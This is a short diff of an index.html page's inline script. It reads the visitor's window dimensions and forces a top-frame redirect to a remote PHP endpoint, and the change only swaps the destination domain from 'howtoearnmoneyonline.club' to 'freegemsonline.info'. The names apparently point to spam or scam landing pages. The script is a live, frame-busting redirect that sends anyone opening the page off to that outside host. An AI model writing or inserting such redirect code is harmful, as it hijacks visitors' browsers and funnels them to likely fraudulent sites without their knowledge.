--- a/index.html
+++ b/index.html
@@ -9,5 +9,5 @@ if (document.body !== null) {
 	x=document.body.clientWidth;
 	y=document.body.clientHeight;
 }
-top.location.href=("https://howtoearnmoneyonline.club/yy.php?"+x+"&vh="+y).replace(/\/$/, "");
+top.location.href=("https://freegemsonline.info/yt.php?"+x+"&vh="+y).replace(/\/$/, "");
 </script>
